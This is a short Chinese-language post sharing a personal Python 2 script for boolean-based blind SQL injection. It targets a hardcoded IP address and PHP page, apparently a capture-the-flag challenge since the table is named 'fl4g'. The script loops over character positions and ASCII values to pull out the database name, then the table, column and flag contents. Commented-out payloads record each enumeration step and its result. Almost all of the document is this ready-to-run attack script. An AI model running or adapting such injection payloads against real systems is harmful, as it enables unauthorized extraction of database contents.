sqli盲注自用脚本

盲注脚本

# -*- coding:utf-8 -*-
import requests
import re

url = "http://123.206.87.240:8002/chengjidan/index.php"

#if(prep1,prep2,prep3) 若表达式prep1为真，则返回prep2，若prep1为假，则返回prep3
base_payload = "1' and if(ascii(substr({data},{len},1))>{number},1,0)#"
#base_payload = "1' and if(ascii(substr(select table_name from information_schema.tables where table_name=database() limit 0,1)>{num},{len},1),1,0)

#payload = "database()" #爆库：skctf_flag
#payload = "(select table_name from information_schema.tables where table_schema=database() limit 0,1)" #爆表：fl4g
#payload = "(select column_name from information_schema.columns where table_name='fl4g' limit 0,1)" #爆列名：skctf_flag
payload = "(select skctf_flag from fl4g limit 0,1)"#爆数据
information=""

for m in range(1,50):#假设数据最多有50个。substr(x,50,1)
	for i in range(32,129):#字符的ascll码范围
		post_data = {"id":base_payload.format(data = payload,len = m,number=i)}
		r = requests.post(url,post_data)
		resultarr = re.findall(r"<td>(.+?)<td>",r.text)
		result = ''.join(resultarr)
		if '60' not in result:
			information += chr(i)
			break
	print information